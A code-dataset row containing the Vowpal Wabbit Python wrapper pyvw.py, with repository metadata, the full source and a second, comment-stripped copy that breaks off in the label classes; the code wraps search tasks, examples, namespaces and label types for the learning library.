print(response) | true | true |
f725dcd14f6c8b71ba1fb843294a5688b1583471 | 26,344 | py | Python | python/pyvw.py | alinabi/vowpal_wabbit | 518513e2023676f060f045ddb751fc1a5e0b7eb2 | [
"BSD-3-Clause"
] | 1 | 2021-07-06T20:02:44.000Z | 2021-07-06T20:02:44.000Z | python/pyvw.py | alinabi/vowpal_wabbit | 518513e2023676f060f045ddb751fc1a5e0b7eb2 | [
"BSD-3-Clause"
] | null | null | null | python/pyvw.py | alinabi/vowpal_wabbit | 518513e2023676f060f045ddb751fc1a5e0b7eb2 | [
"BSD-3-Clause"
] | null | null | null | import sys
import pylibvw
class SearchTask():
    """Base class for user-defined search (learn-to-search) tasks.

    Subclasses implement _run (and optionally _setup/_takedown); this base
    class wires those hooks into vw's structured-prediction machinery.
    """
    def __init__(self, vw, sch, num_actions):
        self.vw = vw
        self.sch = sch
        # A parsed blank line tells vw a multi-line example has ended; the
        # dummy example is what we actually feed the learner on every call.
        self.blank_line = self.vw.example("")
        self.blank_line.finish()
        self.bogus_example = self.vw.example("1 | x")
    def __del__(self):
        # Hand the dummy example back to vw for recycling.
        self.bogus_example.finish()
    def _run(self, your_own_input_example):
        # Overridden by subclasses with the task's actual logic.
        pass
    def _call_vw(self, my_example, isTest, useOracle=False):
        """Route one structured example through vw via the _run hook."""
        self._output = None
        self.bogus_example.set_test_only(isTest)
        def run():
            self._output = self._run(my_example)
        has_hook = lambda name: callable(getattr(self, name, None))
        setup = (lambda: self._setup(my_example)) if has_hook("_setup") else None
        takedown = (lambda: self._takedown(my_example)) if has_hook("_takedown") else None
        self.sch.set_structured_predict_hook(run, setup, takedown)
        self.sch.set_force_oracle(useOracle)
        self.vw.learn(self.bogus_example)
        # Learning on the blank line is what triggers the _run hook above.
        self.vw.learn(self.blank_line)
    def learn(self, data_iterator):
        """Run a training pass over every structured example yielded."""
        for structured_example in data_iterator.__iter__():
            self._call_vw(structured_example, isTest=False)
    def example(self, initStringOrDict=None, labelType=pylibvw.vw.lDefault):
        """Create a vw example; the initializer is dropped when search does
        not actually need example contents."""
        init = initStringOrDict if self.sch.predict_needs_example() else None
        return self.vw.example(init, labelType)
    def predict(self, my_example, useOracle=False):
        """Run the task on one structured example and return its output."""
        self._call_vw(my_example, isTest=True, useOracle=useOracle)
        return self._output
class vw(pylibvw.vw):
    """The pyvw.vw object is a (trivial) wrapper around the pylibvw.vw
    object; you're probably best off using this directly and ignoring
    the pylibvw.vw structure entirely."""
    def __init__(self, argString=None, **kw):
        """Initialize the vw object. The (optional) argString is the
        same as the command line arguments you'd use to run vw (eg,"--audit").
        you can also use key/value pairs as in:
          pyvw.vw(audit=True, b=24, k=True, c=True, l2=0.001)
        or a combination, for instance:
          pyvw.vw("--audit", b=26)"""
        def format(key,val):
            # a flag set to False is omitted entirely; True yields a bare flag
            if type(val) is bool and val == False: return ''
            s = ('-'+key) if len(key) == 1 else ('--'+key)
            if type(val) is not bool or val != True: s += ' ' + str(val)
            return s
        # bug fix: kw.iteritems() is python-2 only; kw.items() works on 2 and 3
        l = [format(k,v) for k,v in kw.items()]
        if argString is not None: l = [argString] + l
        pylibvw.vw.__init__(self,' '.join(l))
        self.finished = False
    def get_weight(self, index, offset=0):
        """Given an (integer) index (and an optional offset), return
        the weight for that position in the (learned) weight vector."""
        return pylibvw.vw.get_weight(self, index, offset)
    def learn(self, ec):
        """Perform an online update; ec can either be an example
        object or a string (in which case it is parsed and then
        learned on)."""
        if isinstance(ec, str):
            self.learn_string(ec)
        else:
            # examples must be set up (quadratics etc.) before learning
            if hasattr(ec, 'setup_done') and not ec.setup_done:
                ec.setup_example()
            pylibvw.vw.learn(self, ec)
    def finish(self):
        """stop VW by calling finish (and, eg, write weights to disk)"""
        if not self.finished:  # guard: the C++ finish must only run once
            pylibvw.vw.finish(self)
            self.finished = True
    def example(self, stringOrDict=None, labelType=pylibvw.vw.lDefault):
        """Construct an example bound to this vw instance; see the example
        class for the accepted initializers (None, string, dict, callable)."""
        return example(self, stringOrDict, labelType)
    def __del__(self):
        self.finish()
    def init_search_task(self, search_task, task_data=None):
        """Instantiate search_task bound to this vw's search pointer after
        installing a `predict` function on it; task_data, if given, is
        forwarded to the task's constructor."""
        sch = self.get_search_ptr()
        def predict(examples, my_tag, oracle, condition=None, allowed=None, learner_id=0):
            """The basic (via-reduction) prediction mechanism. Several
            variants are supported through this overloaded function:
              'examples' can be a single example (interpreted as
                 non-LDF mode) or a list of examples (interpreted as
                 LDF mode). it can also be a lambda function that
                 returns a single example or list of examples, and in
                 that list, each element can also be a lambda function
                 that returns an example. this is done for lazy
                 example construction (aka speed).
              'my_tag' should be an integer id, specifying this prediction
              'oracle' can be a single label (or in LDF mode a single
                 array index in 'examples') or a list of such labels if
                 the oracle policy is indecisive; if it is None, then
                 the oracle doesn't care
              'condition' should be either: (1) a (tag,char) pair, indicating
                 to condition on the given tag with identifier from the char;
                 or (2) a (tag,len,char) triple, indicating to condition on
                 tag, tag-1, tag-2, ..., tag-len with identifiers char,
                 char+1, char+2, ..., char+len. or it can be a (heterogenous)
                 list of such things.
              'allowed' can be None, in which case all actions are allowed;
                 or it can be list of valid actions (in LDF mode, this should
                 be None and you should encode the valid actions in 'examples')
              'learner_id' specifies the underlying learner id
            Returns a single prediction.
            """
            P = sch.get_predictor(my_tag)
            if sch.is_ldf():
                # we need to know how many actions there are, even if we don't know their identities
                while hasattr(examples, '__call__'): examples = examples()
                if not isinstance(examples, list): raise TypeError('expected example _list_ in LDF mode for SearchTask.predict()')
                P.set_input_length(len(examples))
                if sch.predict_needs_example():
                    for n in range(len(examples)):
                        ec = examples[n]
                        while hasattr(ec, '__call__'): ec = ec() # unfold the lambdas
                        if not isinstance(ec, example) and not isinstance(ec, pylibvw.example): raise TypeError('non-example in LDF example list in SearchTask.predict()')
                        if hasattr(ec, 'setup_done') and not ec.setup_done:
                            ec.setup_example()
                        P.set_input_at(n, ec)
                # else: search only needs the action count, not the contents
            else:
                if sch.predict_needs_example():
                    while hasattr(examples, '__call__'): examples = examples()
                    if hasattr(examples, 'setup_done') and not examples.setup_done:
                        examples.setup_example()
                    P.set_input(examples)
                # else: search only needs the action count, not the example
            if oracle is None: pass
            elif isinstance(oracle, list):
                if len(oracle) > 0: P.set_oracles(oracle)
            elif isinstance(oracle, int): P.set_oracle(oracle)
            else: raise TypeError('expecting oracle to be a list or an integer')
            if condition is not None:
                if not isinstance(condition, list): condition = [condition]
                for c in condition:
                    if not isinstance(c, tuple): raise TypeError('item ' + str(c) + ' in condition list is malformed')
                    if len(c) == 2 and isinstance(c[0], int) and isinstance(c[1], str) and len(c[1]) == 1:
                        # (tag, char): condition on one previous prediction
                        P.add_condition(max(0, c[0]), c[1])
                    elif len(c) == 3 and isinstance(c[0], int) and isinstance(c[1], int) and isinstance(c[2], str) and len(c[2]) == 1:
                        # (tag, len, char): condition on a range of predictions
                        P.add_condition_range(max(0,c[0]), max(0,c[1]), c[2])
                    else:
                        raise TypeError('item ' + str(c) + ' in condition list malformed')
            if allowed is None: pass
            elif isinstance(allowed, list):
                P.set_alloweds(allowed)
            else: raise TypeError('allowed argument wrong type')
            if learner_id != 0: P.set_learner_id(learner_id)
            return P.predict()
        sch.predict = predict
        num_actions = sch.get_num_actions()
        return search_task(self, sch, num_actions) if task_data is None else search_task(self, sch, num_actions, task_data)
class namespace_id():
    """Maps between the two ways a namespace can be referenced: its integer
    position within a particular example, or its single-character name.
    Mostly used internally; you shouldn't really need to touch this."""
    def __init__(self, ex, id):
        """Build from an example `ex` and an `id`, where `id` is either an
        int (an index into ex.indices[]) or a string whose first character
        names the namespace (empty string means the default ' ' namespace)."""
        if isinstance(id, int):
            # index form: look the namespace character up in the example
            if id < 0 or id >= ex.num_namespaces():
                raise Exception('namespace ' + str(id) + ' out of bounds')
            self.id = id
            self.ord_ns = ex.namespace(id)
            self.ns = chr(self.ord_ns)
        elif isinstance(id, str):
            # character form: the index is left unknown (avoids a linear search)
            self.id = None
            self.ns = (id or ' ')[0]
            self.ord_ns = ord(self.ns)
        else:
            raise Exception("ns_to_characterord failed because id type is unknown: " + str(type(id)))
class example_namespace():
    """Helper that exposes a single namespace of an example, enabling
    namespace-level operations and indexing like ex['x'][0] to get the
    0th feature in namespace 'x' in example ex."""
    def __init__(self, ex, ns, ns_hash=None):
        """Construct from an example and a target namespace (ns must be a
        namespace_id); `ns_hash` optionally supplies the precomputed hash
        of the namespace."""
        if not isinstance(ns, namespace_id):
            raise TypeError
        self.ex = ex
        self.ns = ns
        # bug fix: the ns_hash argument used to be discarded (always None)
        self.ns_hash = ns_hash
    def num_features_in(self):
        """Return the total number of features in this namespace."""
        return self.ex.num_features_in(self.ns)
    def __getitem__(self, i):
        """Get the feature/value pair for the ith feature in this
        namespace."""
        f = self.ex.feature(self.ns, i)
        v = self.ex.feature_weight(self.ns, i)
        return (f, v)
    def iter_features(self):
        """Iterate over all feature/value pairs in this namespace."""
        for i in range(self.num_features_in()):
            yield self[i]
    def push_feature(self, feature, v=1.):
        """Add an unhashed feature to the current namespace (fails if
        setup has already run on this example)."""
        if self.ns_hash is None:
            # hash the namespace lazily, once, and cache the result
            # NOTE(review): hash_space is handed the namespace_id object
            # rather than its .ns character -- confirm against pylibvw.
            self.ns_hash = self.ex.vw.hash_space( self.ns )
        self.ex.push_feature(self.ns, feature, v, self.ns_hash)
    def pop_feature(self):
        """Remove the top feature from the current namespace; returns True
        if a feature was removed, returns False if there were no
        features to pop."""
        return self.ex.pop_feature(self.ns)
    def push_features(self, ns, featureList):
        """Push a list of features to this namespace. Each feature in the
        list can either be an integer (already hashed) or a string (to be
        hashed) and may be paired with a value or not (if not, the value
        is assumed to be 1.0). See example.push_features for examples.
        Note: the `ns` argument is ignored; the namespace bound at
        construction is always used."""
        self.ex.push_features(self.ns, featureList)
class abstract_label:
    """Base class shared by every VW label type."""
    def __init__(self):
        pass
    def from_example(self, ex):
        """Populate this label's fields from a VW example; must be
        overridden by concrete label classes."""
        raise Exception("from_example not yet implemented")
class simple_label(abstract_label):
    """Regression-style label: value, importance weight, initial
    prediction, and the model's prediction."""
    def __init__(self, label=0., weight=1., initial=0., prediction=0.):
        abstract_label.__init__(self)
        # passing an example pulls the label fields straight out of it
        if isinstance(label, example):
            self.from_example(label)
        else:
            self.label = label
            self.weight = weight
            self.initial = initial
            self.prediction = prediction
    def from_example(self, ex):
        """Populate the fields from a VW example."""
        self.label = ex.get_simplelabel_label()
        self.weight = ex.get_simplelabel_weight()
        self.initial = ex.get_simplelabel_initial()
        self.prediction = ex.get_simplelabel_prediction()
    def __str__(self):
        # VW text format: "label" or "label:weight" for non-unit weights
        s = str(self.label)
        if self.weight != 1.:
            # bug fix: weight must be stringified before concatenation
            # (the original `':' + self.weight` raised TypeError)
            s += ':' + str(self.weight)
        return s
class multiclass_label(abstract_label):
    """Multiclass label: class id, importance weight, and prediction."""
    def __init__(self, label=1, weight=1., prediction=1):
        abstract_label.__init__(self)
        self.label = label
        self.weight = weight
        self.prediction = prediction
    def from_example(self, ex):
        """Populate the fields from a VW example."""
        self.label = ex.get_multiclass_label()
        self.weight = ex.get_multiclass_weight()
        self.prediction = ex.get_multiclass_prediction()
    def __str__(self):
        # VW text format: "label" or "label:weight" for non-unit weights
        s = str(self.label)
        if self.weight != 1.:
            # bug fix: weight must be stringified before concatenation
            # (the original `':' + self.weight` raised TypeError)
            s += ':' + str(self.weight)
        return s
class cost_sensitive_label(abstract_label):
    """Cost-sensitive label: a list of per-class cost entries plus the
    model's prediction."""
    class wclass:
        """One class entry: label id, its cost, and diagnostics."""
        def __init__(self, label, cost=0., partial_prediction=0., wap_value=0.):
            self.label = label
            self.cost = cost
            self.partial_prediction = partial_prediction
            self.wap_value = wap_value
    def __init__(self, costs=None, prediction=0):
        abstract_label.__init__(self)
        # bug fix: the mutable default ([]) was shared across instances
        self.costs = [] if costs is None else costs
        self.prediction = prediction
    def from_example(self, ex):
        """Populate the fields from a VW example."""
        self.prediction = ex.get_costsensitive_prediction()
        self.costs = []
        # bug fixes: num_costs must be *called* (it was passed to range as a
        # bound method) and wclass must be reached via self (bare `wclass`
        # was a NameError inside this method).
        # NOTE(review): the per-cost getters are called without the index i --
        # confirm against the pylibvw API.
        for i in range(ex.get_costsensitive_num_costs()):
            wc = self.wclass(ex.get_costsensitive_class(),
                             ex.get_costsensitive_cost(),
                             ex.get_costsensitive_partial_prediction(),
                             ex.get_costsensitive_wap_value())
            self.costs.append(wc)
    def __str__(self):
        # bug fix: the closing bracket was missing
        return '[' + ' '.join([str(c.label) + ':' + str(c.cost) for c in self.costs]) + ']'
class cbandits_label(abstract_label):
    """Contextual-bandit label: a list of per-action cost/probability
    entries plus the model's prediction."""
    class wclass:
        """One action entry: label id, observed cost, and probability."""
        def __init__(self, label, cost=0., partial_prediction=0., probability=0.):
            self.label = label
            self.cost = cost
            self.partial_prediction = partial_prediction
            self.probability = probability
    def __init__(self, costs=None, prediction=0):
        abstract_label.__init__(self)
        # bug fix: the mutable default ([]) was shared across instances
        self.costs = [] if costs is None else costs
        self.prediction = prediction
    def from_example(self, ex):
        """Populate the fields from a VW example."""
        self.prediction = ex.get_cbandits_prediction()
        self.costs = []
        # bug fixes: num_costs must be *called* (it was passed to range as a
        # bound method) and wclass must be reached via self (bare `wclass`
        # was a NameError inside this method).
        # NOTE(review): the per-cost getters are called without the index i --
        # confirm against the pylibvw API.
        for i in range(ex.get_cbandits_num_costs()):
            wc = self.wclass(ex.get_cbandits_class(),
                             ex.get_cbandits_cost(),
                             ex.get_cbandits_partial_prediction(),
                             ex.get_cbandits_probability())
            self.costs.append(wc)
    def __str__(self):
        # bug fix: the closing bracket was missing
        return '[' + ' '.join([str(c.label) + ':' + str(c.cost) for c in self.costs]) + ']'
class example(pylibvw.example):
    """The example class is a (non-trivial) wrapper around
    pylibvw.example. Most of the wrapping is to make the interface
    easier to use (by making the types safer via namespace_id) and
    also with added python-specific functionality."""
    def __init__(self, vw, initStringOrDict=None, labelType=pylibvw.vw.lDefault):
        """Construct a new example from vw. If initString is None, you
        get an "empty" example which you can construct by hand (see, eg,
        example.push_features). If initString is a string, then this
        string is parsed as it would be from a VW data file into an
        example (and "setup_example" is run). if it is a dict, then we add all features in that dictionary. finally, if it's a function, we (repeatedly) execute it fn() until it's not a function any more (for lazy feature computation)."""
        # unfold chained lambdas until we reach a concrete initializer
        while hasattr(initStringOrDict, '__call__'):
            initStringOrDict = initStringOrDict()
        if initStringOrDict is None:
            pylibvw.example.__init__(self, vw, labelType)
            self.setup_done = False
        elif isinstance(initStringOrDict, str):
            # string input is parsed and set up by the C++ layer directly
            pylibvw.example.__init__(self, vw, labelType, initStringOrDict)
            self.setup_done = True
        elif isinstance(initStringOrDict, dict):
            pylibvw.example.__init__(self, vw, labelType)
            # vw/stride/finished must exist before push_feature_dict runs;
            # they are (redundantly) re-assigned after the if/elif below
            self.vw = vw
            self.stride = vw.get_stride()
            self.finished = False
            self.push_feature_dict(vw, initStringOrDict)
            self.setup_done = False
        else:
            raise TypeError('expecting string or dict as argument for example construction')
        self.vw = vw
        self.stride = vw.get_stride()
        self.finished = False
        self.labelType = labelType
    def __del__(self):
        # return the example to VW's pool when garbage-collected
        self.finish()
    def __enter__(self):
        """Context-manager entry: the example itself is the managed value."""
        return self
    def __exit__(self,typ,value,traceback):
        """Context-manager exit: recycle the example; exceptions propagate."""
        self.finish()
        return typ is None
    def get_ns(self, id):
        """Construct a namespace_id from either an integer or string
        (or, if a namespace_id is fed it, just return it directly)."""
        if isinstance(id, namespace_id):
            return id
        else:
            return namespace_id(self, id)
    def __getitem__(self, id):
        """Get an example_namespace object associated with the given
        namespace id."""
        return example_namespace(self, self.get_ns(id))
    def feature(self, ns, i):
        """Get the i-th hashed feature id in a given namespace (i can
        range from 0 to self.num_features_in(ns)-1)"""
        ns = self.get_ns(ns) # guaranteed to be a single character
        f = pylibvw.example.feature(self, ns.ord_ns, i)
        if self.setup_done:
            # undo the offset/stride applied by setup_example
            # NOTE(review): "/" is true division under python 3, so hashed
            # ids come back as floats here; "//" may be what was intended.
            f = (f - self.get_ft_offset()) / self.stride
        return f
    def feature_weight(self, ns, i):
        """Get the value(weight) associated with a given feature id in
        a given namespace (i can range from 0 to
        self.num_features_in(ns)-1)"""
        return pylibvw.example.feature_weight(self, self.get_ns(ns).ord_ns, i)
    def set_label_string(self, string):
        """Give this example a new label, formatted as a string (ala
        the VW data file format)."""
        pylibvw.example.set_label_string(self, self.vw, string, self.labelType)
    def setup_example(self):
        """If this example hasn't already been setup (ie, quadratic
        features constructed, etc.), do so."""
        if self.setup_done:
            raise Exception('trying to setup_example on an example that is already setup')
        self.vw.setup_example(self)
        self.setup_done = True
    def unsetup_example(self):
        """If this example has been setup, reverse that process so you can continue editing the examples."""
        if not self.setup_done:
            raise Exception('trying to unsetup_example that has not yet been setup')
        self.vw.unsetup_example(self)
        self.setup_done = False
    def learn(self):
        """Learn on this example (and before learning, automatically
        call setup_example if the example hasn't yet been setup)."""
        if not self.setup_done:
            self.setup_example()
        self.vw.learn(self)
    def sum_feat_sq(self, ns):
        """Return the total sum feature-value squared for a given
        namespace."""
        return pylibvw.example.sum_feat_sq(self, self.get_ns(ns).ord_ns)
    def num_features_in(self, ns):
        """Return the total number of features in a given namespace."""
        return pylibvw.example.num_features_in(self, self.get_ns(ns).ord_ns)
    def get_feature_id(self, ns, feature, ns_hash=None):
        """Return the hashed feature id for a given feature in a given
        namespace. feature can either be an integer (already a feature
        id) or a string, in which case it is hashed. Note that if
        --hash all is on, then get_feature_id(ns,"5") !=
        get_feature_id(ns, 5). If you've already hashed the namespace,
        you can optionally provide that value to avoid re-hashing it."""
        if isinstance(feature, int):
            return feature
        if isinstance(feature, str):
            if ns_hash is None:
                ns_hash = self.vw.hash_space( self.get_ns(ns).ns )
            return self.vw.hash_feature(feature, ns_hash)
        raise Exception("cannot extract feature of type: " + str(type(feature)))
    def push_hashed_feature(self, ns, f, v=1.):
        """Add a hashed feature to a given namespace."""
        # editing requires the example to be in the un-setup state
        if self.setup_done: self.unsetup_example();
        pylibvw.example.push_hashed_feature(self, self.get_ns(ns).ord_ns, f, v)
    def push_feature(self, ns, feature, v=1., ns_hash=None):
        """Add an unhashed feature to a given namespace."""
        f = self.get_feature_id(ns, feature, ns_hash)
        self.push_hashed_feature(ns, f, v)
    def pop_feature(self, ns):
        """Remove the top feature from a given namespace; returns True
        if a feature was removed, returns False if there were no
        features to pop."""
        if self.setup_done: self.unsetup_example();
        return pylibvw.example.pop_feature(self, self.get_ns(ns).ord_ns)
    def push_namespace(self, ns):
        """Push a new namespace onto this example. You should only do
        this if you're sure that this example doesn't already have the
        given namespace."""
        if self.setup_done: self.unsetup_example();
        pylibvw.example.push_namespace(self, self.get_ns(ns).ord_ns)
    def pop_namespace(self):
        """Remove the top namespace from an example; returns True if a
        namespace was removed, or False if there were no namespaces
        left."""
        if self.setup_done: self.unsetup_example();
        return pylibvw.example.pop_namespace(self)
    def ensure_namespace_exists(self, ns):
        """Check to see if a namespace already exists. If it does, do
        nothing. If it doesn't, add it."""
        if self.setup_done: self.unsetup_example();
        return pylibvw.example.ensure_namespace_exists(self, self.get_ns(ns).ord_ns)
    def push_features(self, ns, featureList):
        """Push a list of features to a given namespace. Each feature
        in the list can either be an integer (already hashed) or a
        string (to be hashed) and may be paired with a value or not
        (if not, the value is assumed to be 1.0).
        Examples:
            ex.push_features('x', ['a', 'b'])
            ex.push_features('y', [('c', 1.), 'd'])
            space_hash = vw.hash_space( 'x' )
            feat_hash = vw.hash_feature( 'a', space_hash )
            ex.push_features('x', [feat_hash]) # note: 'x' should match the space_hash!
        """
        ns = self.get_ns(ns)
        self.ensure_namespace_exists(ns)
        self.push_feature_list(self.vw, ns.ord_ns, featureList) # much faster just to do it in C++
    def finish(self):
        """Tell VW that you're done with this example and it can
        recycle it for later use."""
        if not self.finished:  # guard: finish_example must only run once
            self.vw.finish_example(self)
            self.finished = True
    def iter_features(self):
        """Iterate over all feature/value pairs in this example (all
        namespace included)."""
        for ns_id in range( self.num_namespaces() ): # iterate over every namespace
            ns = self.get_ns(ns_id)
            for i in range(self.num_features_in(ns)):
                f = self.feature(ns, i)
                v = self.feature_weight(ns, i)
                yield f,v
    def get_label(self, label_class=simple_label):
        """Given a known label class (default is simple_label), get
        the corresponding label structure for this example."""
        return label_class(self)
    def get_topics(self):
        """Return a vector of LDA topic weights for this example"""
        n = self.vw.lda()
        if n > 0:
            return [self.get_topic_prediction(i) for i in range(n)]
        else:
            # LDA is not enabled on this vw instance
            return None
#help(example)
| 43.186885 | 238 | 0.602984 | import sys
import pylibvw
class SearchTask():
    """Base class for user-defined search (learn-to-search) tasks;
    subclasses implement _run (and optionally _setup/_takedown)."""
    def __init__(self, vw, sch, num_actions):
        self.vw = vw
        self.sch = sch
        # blank line terminates a multi-line example; bogus_example is the
        # dummy example actually fed to the learner on every call
        self.blank_line = self.vw.example("")
        self.blank_line.finish()
        self.bogus_example = self.vw.example("1 | x")
    def __del__(self):
        # hand the dummy example back to VW for recycling
        self.bogus_example.finish()
        pass
    def _run(self, your_own_input_example):
        # subclasses override this with the task's actual logic
        pass
    def _call_vw(self, my_example, isTest, useOracle=False):
        """Route one structured example through VW via the _run hook."""
        self._output = None
        self.bogus_example.set_test_only(isTest)
        def run(): self._output = self._run(my_example)
        setup = None
        takedown = None
        # install the optional subclass hooks only if they are defined
        if callable(getattr(self, "_setup", None)): setup = lambda: self._setup(my_example)
        if callable(getattr(self, "_takedown", None)): takedown = lambda: self._takedown(my_example)
        self.sch.set_structured_predict_hook(run, setup, takedown)
        self.sch.set_force_oracle(useOracle)
        self.vw.learn(self.bogus_example)
        # learning on the blank line is what triggers the _run hook above
        self.vw.learn(self.blank_line)
    def learn(self, data_iterator):
        """Run a training pass over every structured example yielded."""
        for my_example in data_iterator.__iter__():
            self._call_vw(my_example, isTest=False);
    def example(self, initStringOrDict=None, labelType=pylibvw.vw.lDefault):
        """Create a VW example; the initializer is dropped when search
        does not actually need example contents."""
        if self.sch.predict_needs_example():
            return self.vw.example(initStringOrDict, labelType)
        else:
            return self.vw.example(None, labelType)
    def predict(self, my_example, useOracle=False):
        """Run the task on one structured example and return its output."""
        self._call_vw(my_example, isTest=True, useOracle=useOracle);
        return self._output
class vw(pylibvw.vw):
    """Python wrapper around the low-level pylibvw.vw driver.

    Keyword arguments to the constructor are translated into VW
    command-line options.
    """

    def __init__(self, argString=None, **kw):
        """Build the VW command line from argString plus keyword options.

        Single-letter keys become "-k", longer keys "--key"; a value of
        True yields a bare flag, False drops the option entirely, and
        any other value is appended after the flag.
        """
        # renamed from `format` to avoid shadowing the builtin
        def _format(key, val):
            if type(val) is bool and val == False: return ''
            s = ('-' + key) if len(key) == 1 else ('--' + key)
            if type(val) is not bool or val != True: s += ' ' + str(val)
            return s
        # bug fix: dict.iteritems() is Python-2-only (AttributeError on
        # Python 3); items() behaves identically here on both versions.
        l = [_format(k, v) for k, v in kw.items()]
        if argString is not None: l = [argString] + l
        pylibvw.vw.__init__(self, ' '.join(l))
        self.finished = False

    def get_weight(self, index, offset=0):
        """Return the model weight at the given index/offset."""
        return pylibvw.vw.get_weight(self, index, offset)

    def learn(self, ec):
        """Learn on a single example (a VW-format string or an example)."""
        if isinstance(ec, str):
            self.learn_string(ec)
        else:
            # examples built feature-by-feature must be set up first
            if hasattr(ec, 'setup_done') and not ec.setup_done:
                ec.setup_example()
            pylibvw.vw.learn(self, ec)

    def finish(self):
        """Finalize the underlying VW object; safe to call repeatedly."""
        if not self.finished:
            pylibvw.vw.finish(self)
            self.finished = True

    def example(self, stringOrDict=None, labelType=pylibvw.vw.lDefault):
        """Construct a high-level example bound to this vw instance."""
        return example(self, stringOrDict, labelType)

    def __del__(self):
        self.finish()

    def init_search_task(self, search_task, task_data=None):
        """Instantiate a SearchTask subclass wired to this vw's search pointer."""
        sch = self.get_search_ptr()

        def predict(examples, my_tag, oracle, condition=None, allowed=None, learner_id=0):
            P = sch.get_predictor(my_tag)
            if sch.is_ldf():
                # LDF mode takes a *list* of examples
                while hasattr(examples, '__call__'): examples = examples()
                if not isinstance(examples, list): raise TypeError('expected example _list_ in LDF mode for SearchTask.predict()')
                P.set_input_length(len(examples))
                if sch.predict_needs_example():
                    for n in range(len(examples)):
                        ec = examples[n]
                        while hasattr(ec, '__call__'): ec = ec() # unfold the lambdas
                        if not isinstance(ec, example) and not isinstance(ec, pylibvw.example): raise TypeError('non-example in LDF example list in SearchTask.predict()')
                        if hasattr(ec, 'setup_done') and not ec.setup_done:
                            ec.setup_example()
                        P.set_input_at(n, ec)
                else:
                    pass # TODO: do we need to set the examples even though they're not used?
            else:
                if sch.predict_needs_example():
                    while hasattr(examples, '__call__'): examples = examples()
                    if hasattr(examples, 'setup_done') and not examples.setup_done:
                        examples.setup_example()
                    P.set_input(examples)
                else:
                    pass
            # (dead `if True:` wrapper and its unreachable else-branch,
            # plus a large commented-out input-setting block, removed)
            if oracle is None: pass
            elif isinstance(oracle, list):
                if len(oracle) > 0: P.set_oracles(oracle)
            elif isinstance(oracle, int): P.set_oracle(oracle)
            else: raise TypeError('expecting oracle to be a list or an integer')
            if condition is not None:
                if not isinstance(condition, list): condition = [condition]
                for c in condition:
                    if not isinstance(c, tuple): raise TypeError('item ' + str(c) + ' in condition list is malformed')
                    if len(c) == 2 and isinstance(c[0], int) and isinstance(c[1], str) and len(c[1]) == 1:
                        # (tag, name-char) single condition
                        P.add_condition(max(0, c[0]), c[1])
                    elif len(c) == 3 and isinstance(c[0], int) and isinstance(c[1], int) and isinstance(c[2], str) and len(c[2]) == 1:
                        # (tag_lo, tag_hi, name-char) range of conditions
                        P.add_condition_range(max(0, c[0]), max(0, c[1]), c[2])
                    else:
                        raise TypeError('item ' + str(c) + ' in condition list malformed')
            if allowed is None: pass
            elif isinstance(allowed, list):
                P.set_alloweds(allowed)
            else: raise TypeError('allowed argument wrong type')
            if learner_id != 0: P.set_learner_id(learner_id)
            p = P.predict()
            return p

        sch.predict = predict
        num_actions = sch.get_num_actions()
        return search_task(self, sch, num_actions) if task_data is None else search_task(self, sch, num_actions, task_data)
class namespace_id():
    """Resolve a namespace reference (index or name) for an example.

    Exposes .id (the index, or None when given by name), .ns (a single
    character) and .ord_ns (that character's ordinal).
    """
    def __init__(self, ex, id):
        if isinstance(id, int):
            # namespace given by position within the example
            if id < 0 or id >= ex.num_namespaces():
                raise Exception('namespace ' + str(id) + ' out of bounds')
            self.id = id
            self.ord_ns = ex.namespace(id)
            self.ns = chr(self.ord_ns)
        elif isinstance(id, str):
            # namespace given by name: only the first character matters;
            # the empty string maps to the default (space) namespace
            name = id if len(id) > 0 else ' '
            self.id = None  # index unknown; finding it would need a linear scan
            self.ns = name[0]
            self.ord_ns = ord(self.ns)
        else:
            raise Exception("ns_to_characterord failed because id type is unknown: " + str(type(id)))
class example_namespace():
    """View of a single namespace within an example.

    Wraps (example, namespace) so features in that namespace can be
    read, pushed and popped without repeating the namespace argument.
    """
    def __init__(self, ex, ns, ns_hash=None):
        if not isinstance(ns, namespace_id):
            raise TypeError
        self.ex = ex
        self.ns = ns
        # bug fix: the supplied ns_hash used to be discarded
        # (self.ns_hash = None), forcing a redundant re-hash on the
        # first push_feature even when the caller already had it.
        self.ns_hash = ns_hash

    def num_features_in(self):
        """Number of features currently in this namespace."""
        return self.ex.num_features_in(self.ns)

    def __getitem__(self, i):
        """Return the (feature, value) pair at position i."""
        f = self.ex.feature(self.ns, i)
        v = self.ex.feature_weight(self.ns, i)
        return (f, v)

    def iter_features(self):
        """Yield every (feature, value) pair in this namespace."""
        for i in range(self.num_features_in()):
            yield self[i]

    def push_feature(self, feature, v=1.):
        """Append one feature with value v, hashing lazily on first use."""
        if self.ns_hash is None:
            self.ns_hash = self.ex.vw.hash_space( self.ns )
        self.ex.push_feature(self.ns, feature, v, self.ns_hash)

    def pop_feature(self):
        """Remove and return the most recently pushed feature."""
        return self.ex.pop_feature(self.ns)

    def push_features(self, ns, featureList):
        """Append a list of features.

        NOTE(review): the `ns` parameter is ignored — features always go
        to self.ns. Kept for interface compatibility; confirm whether
        callers rely on passing it.
        """
        self.ex.push_features(self.ns, featureList)
class abstract_label:
    """Common base class for the concrete VW label types below."""

    def __init__(self):
        pass

    def from_example(self, ex):
        """Populate this label from a VW example; subclasses must override."""
        raise Exception("from_example not yet implemented")
class simple_label(abstract_label):
    """Regression-style label: value, importance weight, initial prediction."""
    def __init__(self, label=0., weight=1., initial=0., prediction=0.):
        abstract_label.__init__(self)
        # passing an example copies its label fields instead
        if isinstance(label, example):
            self.from_example(label)
        else:
            self.label = label
            self.weight = weight
            self.initial = initial
            self.prediction = prediction

    def from_example(self, ex):
        """Read the simple-label fields out of a VW example."""
        self.label = ex.get_simplelabel_label()
        self.weight = ex.get_simplelabel_weight()
        self.initial = ex.get_simplelabel_initial()
        self.prediction = ex.get_simplelabel_prediction()

    def __str__(self):
        s = str(self.label)
        if self.weight != 1.:
            # bug fix: concatenating the float weight directly raised
            # TypeError; it must be stringified first.
            s += ':' + str(self.weight)
        return s
class multiclass_label(abstract_label):
    """Multiclass label: class id, importance weight and prediction."""
    def __init__(self, label=1, weight=1., prediction=1):
        abstract_label.__init__(self)
        self.label = label
        self.weight = weight
        self.prediction = prediction

    def from_example(self, ex):
        """Read the multiclass-label fields out of a VW example."""
        self.label = ex.get_multiclass_label()
        self.weight = ex.get_multiclass_weight()
        self.prediction = ex.get_multiclass_prediction()

    def __str__(self):
        s = str(self.label)
        if self.weight != 1.:
            # bug fix: concatenating the float weight directly raised
            # TypeError; it must be stringified first.
            s += ':' + str(self.weight)
        return s
